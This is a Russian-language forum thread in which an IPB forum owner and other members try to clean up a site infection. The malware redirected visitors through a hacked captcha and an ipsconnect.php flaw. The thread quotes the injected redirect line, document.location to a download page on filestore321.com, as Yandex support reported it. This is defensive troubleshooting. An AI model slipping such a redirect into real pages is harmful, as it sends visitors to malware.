Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

К сожалению, я на Вы с IPB, а глобального поиска по шаблонам в админке нет, какие именно файлы (таблицы) за это могут отвечать?

Кеш шаблона находится на диске - /cache/skin_cache/cacheid_%id/, т.е. php код который отрабатывает.

Шаблон хранится в базе данных и при его редактирование кеш на диске обновляется.

В админке есть поиск по шаблонам с поддержкой регулярных выражений - Внешний вид -> Поиск и замена.

В админке есть поиск по шаблонам с поддержкой регулярных выражений - Внешний вид -> Поиск и замена.

 

Правильно ли я понимаю, что нужно исать либо прямой код переадресации <script src, либо base64_decode или preg_replace?

Да. Но вариантов там может быть очень много. Начините с простой функции переадресации и двигаетесь дальше к функциям которые применяются для обфускации или выполнения стороннего кода.

Да. Но вариантов там может быть очень много. Начините с простой функции переадресации и двигаетесь дальше к функциям которые применяются для обфускации или выполнения стороннего кода.

 

Уже понял, что приходится двигаться дальше, т.к. поиском по админке вообще очень мало упоминаний всех трёх функций и с виду все безобидные. Бэйсдекод вообще только однажды был и там была ссылка на сайт автора хука. Решил еще раз айболитом, но показывает 84 уязвимости, при этом в основном на переменные почему-то, которые достаточно безобидные с виду. В общем окончательно запутался.

Решил еще раз айболитом, но показывает 84 уязвимости, при этом в основном на переменные почему-то, которые достаточно безобидные с виду. В общем окончательно запутался.

Если нет ничего подозрительного, на Ваш взгляд, в файлах, то стоит задуматься над

но он проявляется только при попытке зарегистрироваться или в свободном разделе, когда пытаешься оставить сообщение как гость, т.е. переадресация случается в том месте где появляется sweetcaptcha. Вот только не могу найти где именно лежит либо форма регистрации (ответа), либо файл капчи, чтобы поискать код.

Я посмотрел код каптчи у Вас на форуме и нашел упоминание о

clktag.com

Далее вбиваем в поисковик и видим

Если нет ничего подозрительного, на Ваш взгляд, в файлах, то стоит задуматься над

Я посмотрел код каптчи у Вас на форуме и нашел упоминание о

clktag.com

Далее вбиваем в поисковик и видим

 

Спасибо, значит это свиткапча взломана :(. Очень жаль. Надо задуматься о смене капчи.

Но от взломщика я так и не избавился. 4 октября кто-то попытался войти в АЦ под моим именем - не удалось, но он тут же вошёл под другим именем, которое (теперь он неактивированный пользователь) и внес изменения в пару стилей, в таблицу includeJS и еще одну, внеся скрипт. Я, конечно, отменил изменения, но как такое вообще возможно, если доступ в АЦ у меня разрешен только админам, а в группе админов только я, маской группы админов тоже никто не пользуется?

Я, конечно, отменил изменения, но как такое вообще возможно, если доступ в АЦ у меня разрешен только админам, а в группе админов только я, маской группы админов тоже никто не пользуется?

Прочитайте тему целиком. Как правильно лечится от этого вируса есть инструкция на первой странице. Если вредоносный код возвращается значит вы не правильно это делаете.

Прочитайте тему целиком. Как правильно лечить от этого вируса есть инструкция на первой странице. Если вредоносный код возвращается значит вы не правильно это делаете.

 

Было сделано всё что в моих силах, т.е. всё кроме смены паролей к БД и ФТП, т.к. не хочу платить продление лицензии на ispmanager lite. Сейчас сменил директорию админки, поставил еще пароль на директорию. Если опять будет взлом, то тут уже понятно, что без доступа по фтп - это не возможно, тогда придется тратить деньги. Я просто безработный на данный момент и даже лишняя $20 теперь совсем не лишняя.

Было сделано всё что в моих силах, т.е. всё кроме смены паролей к БД и ФТП, т.к. не хочу платить продление лицензии на ispmanager lite.

ISP это всего лишь панель управления. Поменять пароли на сервере с успехом можно и без нее.

 

Если опять будет взлом, то тут уже понятно, что без доступа по фтп - это не возможно

Возможно, и даже проще чем кажется. Без шелла не сервере (с наличием шелла вы хоть весь форум можете переименовать) и доступом в АЦ это сложнее будет сделать, но просто никто не станет заморачиватся.

Итак, я решил проверить свой форум на вирусы.

 

Что мы имеем: IPB 3.4.6(нулл от Мафии), Ai-Bolit, моё незнание, но желание сделать лучше.

 

Начал вот с чего: зашел в Внешний вид > Инструменты > Обновление кеш-файлов. Потом запустил ai-bolit в директории с форумом.

Вот отчет по Ai-Bolit - https://yadi.sk/d/nGqZmfsomRhTr (форум не хотел загружать файл :( )

 

Прочитав отчет я удалил пока только этот файл - /forum/uploads/imgs/thumb_pre_1427038609__img_20140912_161358.jpg. С остальными файлами прошу помощи у вас.

 

Странно, Яндекс.Вебмастер об угрозах молчит :( На всякий случай, покажу еще sql_latest_error.cgi

 

Спасибо

Странно, Яндекс.Вебмастер об угрозах молчит

Значит это не Ваш случай.

 

На всякий случай, покажу еще sql_latest_error.cgi

Атака идет через /interface/ipsconnect/ipsconnect.php. Уязвимость обнаружена еще в ноябре прошлого года.

 

@arthur1, Вам дали 2 ссылки на темы, в одной из которых выложены патчи.

@newbie, да, я видел эти патчи, но они для 3.1.х, 3.2.х и 3.4.х, а у меня 3.4.х :(

Удалить вирус- выполнить sql запрос-збросить кэш - обновить форум на нормальную версию не НУЛЛ 3.4.8

Так а как найти вирус?